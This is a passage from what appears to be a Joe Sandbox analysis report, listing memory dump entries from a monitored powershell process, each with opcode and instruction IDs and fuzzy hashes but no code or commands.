                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6175ce0d69951b69f6cdeb81ec5c544eda35a4af22f4015917b748a7f6c8579
                                          • Instruction ID: 7f121533bd1a722b4a1815dc42e55b4d9ec22964232324edd863bd3c4c77bafb
                                          • Opcode Fuzzy Hash: c6175ce0d69951b69f6cdeb81ec5c544eda35a4af22f4015917b748a7f6c8579
                                          • Instruction Fuzzy Hash: 5E21D534A002488FDB25DF68C8547EEBBF2BF84305F0058A9D501BB290DB7A6D45CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 066aff49a05c215c9a6a16676bfa0c32d25351b46cb04bd3f04579945b3629b9
                                          • Instruction ID: 064e3f0e7ab79ba07bbd0b10f7da1460a0bda5295caf54c334ca65f37b99c11d
                                          • Opcode Fuzzy Hash: 066aff49a05c215c9a6a16676bfa0c32d25351b46cb04bd3f04579945b3629b9
                                          • Instruction Fuzzy Hash: 7D21F9342007488FC364EB79D854AAA77E6FF84301F51896DD19A8B3A5DF32AC01CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4067bf5773cd575b9611e3b99b3935a47022271da7fa5e29e43e13b0c63ee96
                                          • Instruction ID: 83ccb11a5137741d5d2d266c0a32ea4e13c2cc33431868b069b7e1e68746ef83
                                          • Opcode Fuzzy Hash: b4067bf5773cd575b9611e3b99b3935a47022271da7fa5e29e43e13b0c63ee96
                                          • Instruction Fuzzy Hash: 00118E7A7042499FCB00EFA9E8849AFBBF6FBC8215F048069F919D7311C73599258B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4624a2d3bdaa9f8e8651dc19ece8441355b9f105e4716a7baae460a9e70131ef
                                          • Instruction ID: b0b3ee1c442efa9eb57d5c9f7d495cd6559a51e92042e834f448c3f2af67682b
                                          • Opcode Fuzzy Hash: 4624a2d3bdaa9f8e8651dc19ece8441355b9f105e4716a7baae460a9e70131ef
                                          • Instruction Fuzzy Hash: 211108325183449FC711EB38DC927A6BFF4DF85345F4888BAE8C4C7242E6349624C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aa58a5378d32ea3d8d7ee8c2393422eed6bde44b3ca172e23ebb2778e42cc9c0
                                          • Instruction ID: 50e0246c145751466f2e3686afae7968a0640a7e4334beed87b92da543cc337f
                                          • Opcode Fuzzy Hash: aa58a5378d32ea3d8d7ee8c2393422eed6bde44b3ca172e23ebb2778e42cc9c0
                                          • Instruction Fuzzy Hash: 1611A3353007865BD720EA79E894AAFB397BFC1308B049A3DE46A9B341EF65B90547C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb90c3efd1f438ae7fe28e685886ce8835fba2b05cb21520a0c8bcbc5f0688de
                                          • Instruction ID: b4a021445a7720031f4451a8b9af5c5f811bd20e96a679f42fcc4112f53526b7
                                          • Opcode Fuzzy Hash: cb90c3efd1f438ae7fe28e685886ce8835fba2b05cb21520a0c8bcbc5f0688de
                                          • Instruction Fuzzy Hash: 5D2124B5D102188FCB50CFA9D884BDEFBF4EB48314F14815AE808BB245D774A945CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c1917f4617ce53c1098bccfd6a6ef66d6a68a59496346b41397dc4e77c898e5
                                          • Instruction ID: 1184caf05add604bbbf7189ecb09f293f3e2c2ddcb84db2b0a60b99de21520d3
                                          • Opcode Fuzzy Hash: 3c1917f4617ce53c1098bccfd6a6ef66d6a68a59496346b41397dc4e77c898e5
                                          • Instruction Fuzzy Hash: 892122B5C002188FCB50CFAAD884BDEBBF4EB48318F14815AE808BB204D774A945CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1d01db0787aa29438df15fc9d90f097253490079881c84d1716a938db73939f
                                          • Instruction ID: aa965f91b76ca885b321f90ab005ada8056f3e8c3f6f93cb06be514eaec6f7e5
                                          • Opcode Fuzzy Hash: c1d01db0787aa29438df15fc9d90f097253490079881c84d1716a938db73939f
                                          • Instruction Fuzzy Hash: 8801B5247047527FFB341A75940C3BB29C68B45758F08687AC447CB6C5EE5EF8828BB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6e629bbea7f7fa7903bcc57d59191730a2d4f4dc7da9b9406e8058c3593fcf0
                                          • Instruction ID: 8f91dd552d4c37bd7605039026526a9643e9ced2f916e3f801de3e4e570d9c26
                                          • Opcode Fuzzy Hash: d6e629bbea7f7fa7903bcc57d59191730a2d4f4dc7da9b9406e8058c3593fcf0
                                          • Instruction Fuzzy Hash: 8411A53530068657D320EA69E4949AFB397BFC1358704962DE86A8B341DF65BD0547C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be21bc36a66fc774dc9f0f8227f19892c42ebe04e52d9af14c33003b80d3f459
                                          • Instruction ID: e25b76877ab7e47569a987c9432d0bddad1acb9ea116b58c66fc9013413be7dc
                                          • Opcode Fuzzy Hash: be21bc36a66fc774dc9f0f8227f19892c42ebe04e52d9af14c33003b80d3f459
                                          • Instruction Fuzzy Hash: E7F0CD337042145FD7149AADE88496A77EDFBC8769715013AE505C7381DF71EC0287D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f6d29a14047ba210ac26d829a0f6936fea84281009af7af9aae75134e9fd941
                                          • Instruction ID: 75ea5ad0dac7ee62ca41a004560e5c75a49db9557fbb87bb77b991272999f8fc
                                          • Opcode Fuzzy Hash: 0f6d29a14047ba210ac26d829a0f6936fea84281009af7af9aae75134e9fd941
                                          • Instruction Fuzzy Hash: A0115A78B007559FDB14DB78C5546AE7AE2AF84304F149829D053AB290EFB5EC01CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d81422d63b102fa6241bef59b1d6d07d9ad0ad3ea68f5f76aeb878ab13b58e72
                                          • Instruction ID: 31036c0dcfd72c7d1849d63feeea28a1486ac8e4b3e772d523910bbdc70e019a
                                          • Opcode Fuzzy Hash: d81422d63b102fa6241bef59b1d6d07d9ad0ad3ea68f5f76aeb878ab13b58e72
                                          • Instruction Fuzzy Hash: 8B115A78A002559FDB14DB78C5546AE7AE2AF84304F148829D053AB390EF75EC01CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a153ea4b090defa499773f49a7cf395955c0667841f03a4291e1620f19f9a115
                                          • Instruction ID: 0acfe356731ba90497a2a7cb0b18868e8ecbdaacfaf5be9ece14ab3440789525
                                          • Opcode Fuzzy Hash: a153ea4b090defa499773f49a7cf395955c0667841f03a4291e1620f19f9a115
                                          • Instruction Fuzzy Hash: D511C4309103498BDB14DF64CC587DEBBF2EF48304F0059A9D901BB290DB7A6E45CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.386766915.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_35cd000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21c0e167b530ebd104577c76da51c2482ca127c772dd05501ffb5118ca29d931
                                          • Instruction ID: a9ef309b78e511773a9810fa5d7f2582f6d3078d57da61d2c8d5038dc8ea3f0a
                                          • Opcode Fuzzy Hash: 21c0e167b530ebd104577c76da51c2482ca127c772dd05501ffb5118ca29d931
                                          • Instruction Fuzzy Hash: 3E01D8715143C49ED720CA6EDC84767BFE8FF41328F08C46EED456B292D2799445C6B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.386766915.00000000035CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035CD000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_35cd000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed8c34c455b6cf39a2066c4d7597e06e6d6d15c63d0d618c590793b005828417
                                          • Instruction ID: a128d8754f847d96974f51e33965ba0474870164ace6d26a6f039bf72280613d
                                          • Opcode Fuzzy Hash: ed8c34c455b6cf39a2066c4d7597e06e6d6d15c63d0d618c590793b005828417
                                          • Instruction Fuzzy Hash: B401407140D3C05FD7128B259C94B62BFB4EF43228F1D85DBD9849F2A3D2695848C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ef4f5012e3f4259173f7733b876c1b234ae0185c4dcb270e326838643690922
                                          • Instruction ID: 85a24455a061ff6a75e22eacfbbc0f333ab6d6912f8acbbc70fe9fbaa436898a
                                          • Opcode Fuzzy Hash: 7ef4f5012e3f4259173f7733b876c1b234ae0185c4dcb270e326838643690922
                                          • Instruction Fuzzy Hash: 61F0FF323042106FD710CAA8D880B6A77AEEB88368F15422AE504C7380CE71EC028790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d42437f10dad5b13e3ece95a47344b2dbe4634b2c70b61060e9d580789359b
                                          • Instruction ID: b060f64c03dad9aa296fe1778cf0128d86fd3c9f6c1c39454904b91f07443074
                                          • Opcode Fuzzy Hash: a3d42437f10dad5b13e3ece95a47344b2dbe4634b2c70b61060e9d580789359b
                                          • Instruction Fuzzy Hash: F701F431E102088BDB14DAA9C8457EEB7F5EF88324F04807AD505F7640EB7968068BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 245e256b98c192a7fe106b0ddafa323a0655046ef37b031070277930cad126e7
                                          • Instruction ID: a499d9a27acdf49a5bc40f5023274c821c47894471d40c7c6c7de308383fc388
                                          • Opcode Fuzzy Hash: 245e256b98c192a7fe106b0ddafa323a0655046ef37b031070277930cad126e7
                                          • Instruction Fuzzy Hash: A7F09A793101094FC748ABBDD458A6E7BEAFFC8706B0244BCE106DB3A5DE25EC008B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da5192f9c25fc4f39cf107c45f06a6e67a0a03b0f01f00749ee05c115d4628c2
                                          • Instruction ID: a83c44d65fda3ed77a07f1cb8646b46f6efe5cc9bf14f5e36b9d4e8032c44641
                                          • Opcode Fuzzy Hash: da5192f9c25fc4f39cf107c45f06a6e67a0a03b0f01f00749ee05c115d4628c2
                                          • Instruction Fuzzy Hash: 40F0B43A2006444FC360E7A8E884B9A77EAEF84315F54446DD10ACB362DE64A8468791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b57f36638ea3f863ed820238fc56fecc37c3b38ce94145ff7021c1ef58be6984
                                          • Instruction ID: d561b8ad6c97d87d2208619ad2b71da6f020ab352cfbdf4c809f579b48f562cf
                                          • Opcode Fuzzy Hash: b57f36638ea3f863ed820238fc56fecc37c3b38ce94145ff7021c1ef58be6984
                                          • Instruction Fuzzy Hash: 64F058393102094FC748ABB9D45892EB7E6FFC9615B0144BCE216DB3A1DE25EC004B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 18593c1504398feac119d19061e929e3a48355a5b9dfcebc82049bdbe198799c
                                          • Instruction ID: 6a565bd460f05a78e57b1e8a8fa36675ea12626d8ef559267cf2e6d05e3919c2
                                          • Opcode Fuzzy Hash: 18593c1504398feac119d19061e929e3a48355a5b9dfcebc82049bdbe198799c
                                          • Instruction Fuzzy Hash: 3CF0E931F006048BDB18CFA8C9457EDB7F1EB88368F04817AC615E7290FB3964078B55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 246b26ceb4ca2173db0bb53989e085be8e1bbbf2a68f181f815267ec04167165
                                          • Instruction ID: abfa7097e5b33c27bc2e885fbc65e9e35087089c803f78d80679aa8b8b3fe7b7
                                          • Opcode Fuzzy Hash: 246b26ceb4ca2173db0bb53989e085be8e1bbbf2a68f181f815267ec04167165
                                          • Instruction Fuzzy Hash: 03F0A7392005444FC360EBB8D484B9E77EBEFC4314F50446DD10ACB371DE60AC458791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 768a2a034627498c693cb64ef7ef414b4596db7abe36b8d3e870873461419e0c
                                          • Instruction ID: 2546f4917f3accaab807ce988d86e7850aded323eca6f424021b653bfc09457f
                                          • Opcode Fuzzy Hash: 768a2a034627498c693cb64ef7ef414b4596db7abe36b8d3e870873461419e0c
                                          • Instruction Fuzzy Hash: DBF01770C042098FCF15CFB9C8512EDBBF4BF48204F5482AAC558E2350E7385541CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b99c601779730d7f28082c68fc82e198ee2d033427617dee1aab2813b0cd881
                                          • Instruction ID: c28bffd04cfa0f68262f7547e7400f2e069b0fae6af66ee454e465eef5dc3dc6
                                          • Opcode Fuzzy Hash: 7b99c601779730d7f28082c68fc82e198ee2d033427617dee1aab2813b0cd881
                                          • Instruction Fuzzy Hash: 8EF09BB0D0421D8FDF58DFAA88412EEBBF1BB4C205F1082AAC518B2250E7385642CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71aa25006ffb8b46f11aa635db03cb5e7e75f57cf3b86a179050a65254fd9c86
                                          • Instruction ID: 470ff46ac8a60cf708b073474ca936972051f7c458352e28c2451ea54d86417e
                                          • Opcode Fuzzy Hash: 71aa25006ffb8b46f11aa635db03cb5e7e75f57cf3b86a179050a65254fd9c86
                                          • Instruction Fuzzy Hash: A3E0DF342102058BDB046B74F80AB7B3BABFFC8300F948538E60687396CE75AD228740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a290f5673ac1584c092a35e50c7ec7919ce4d0f6819a8408242d5b3fb90c5ad3
                                          • Instruction ID: b623b403634b675ff74fb834057644f4f35722fcf59e08977676d0d7df0d20e5
                                          • Opcode Fuzzy Hash: a290f5673ac1584c092a35e50c7ec7919ce4d0f6819a8408242d5b3fb90c5ad3
                                          • Instruction Fuzzy Hash: 1CE0CD351102109FC700DB64F84DB857BB9FF48314F5141B9E50DD7372CA65D80187C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9327096b65acbc9f7d2f83031ab84c56a79fe89303810cabab78059f5aa08b30
                                          • Instruction ID: f4f9f957e970811643e96616d7326f99326c6177ca521eb62e563b2b48323829
                                          • Opcode Fuzzy Hash: 9327096b65acbc9f7d2f83031ab84c56a79fe89303810cabab78059f5aa08b30
                                          • Instruction Fuzzy Hash: FAE04F34600204CFCB15DB54D4446ED77B0EF8032AF5514E9D605BB5A0D735A945DF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 46bf44dbffefadb3d62ac11c2efc7e41164224bc6e7fc0b9b7a01381c88c559b
                                          • Instruction ID: df198d907e4b2ffb246c72b9e6ac92e69b7264648497865da516c897e517771f
                                          • Opcode Fuzzy Hash: 46bf44dbffefadb3d62ac11c2efc7e41164224bc6e7fc0b9b7a01381c88c559b
                                          • Instruction Fuzzy Hash: E2E012343103468BDB05ABB4F41997B3BABFBC8205BA48534E609877A6DE759D228B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b250b376dee642ac9de70644aebe8edac0214eff53de385af9fbc15c6bd7b73
                                          • Instruction ID: ca90590881812847a37f2169f5fceb81705213360542255e0554cf05f8e70f5a
                                          • Opcode Fuzzy Hash: 5b250b376dee642ac9de70644aebe8edac0214eff53de385af9fbc15c6bd7b73
                                          • Instruction Fuzzy Hash: 5CD05E392102149FC340EB68F84CE967BB9FF49725B5241A5EA0D8B372CA25DC018BD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca49cee533cd05930e81b99b3ac6b985f75b6e47ec513b936a511944447977b6
                                          • Instruction ID: 2c92fa6ad72d00574defe4b17e78c1162c7c51939004776a3ad22669adb50a13
                                          • Opcode Fuzzy Hash: ca49cee533cd05930e81b99b3ac6b985f75b6e47ec513b936a511944447977b6
                                          • Instruction Fuzzy Hash: 9ED05E218A07845BDB012770F80F36A7F24DF90212F0585B9A00F812D3CD2998808A01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6acb6b8309cfbdaf37d619af17bb08b23b05b521d9c2131e8e5bb9f156bcd1e6
                                          • Instruction ID: a0ab611adf540e43fd7a81e7d4f8c51329e00d122635585ed92050baf255d325
                                          • Opcode Fuzzy Hash: 6acb6b8309cfbdaf37d619af17bb08b23b05b521d9c2131e8e5bb9f156bcd1e6
                                          • Instruction Fuzzy Hash: 7BD012345A47859FDB0537B0B40E26E7F69DF80211F01807AF00F851E3CE3998448F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b380c6fe0034b610d421b8d0bef94f9250f1fc683665938844e87b39141632e
                                          • Instruction ID: 2e7843fa7dfde9a95f2097fd9045149ee10e5b9ce7285caae943e1a35f4d1107
                                          • Opcode Fuzzy Hash: 9b380c6fe0034b610d421b8d0bef94f9250f1fc683665938844e87b39141632e
                                          • Instruction Fuzzy Hash: C1B0123106081407EE01A214FDABBC23C18DF00305F4580816048C02C3D684448088E3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.387509105.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4ed0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cda75d194f226b932b4ee2da910b77c28fb1b4fb6d86a6b1c3d212fc65cccf10
                                          • Instruction ID: 7a2b3f10afc6f9ec1b33769db921da94c3bfd1172343c772b4b0ca1cd1dadae4
                                          • Opcode Fuzzy Hash: cda75d194f226b932b4ee2da910b77c28fb1b4fb6d86a6b1c3d212fc65cccf10
                                          • Instruction Fuzzy Hash: 5EB092391801086BDB10EB44F94AB853B60DBD4300F6641206625910919668184A9975
                                          Uniqueness

                                          Uniqueness Score: -1.00%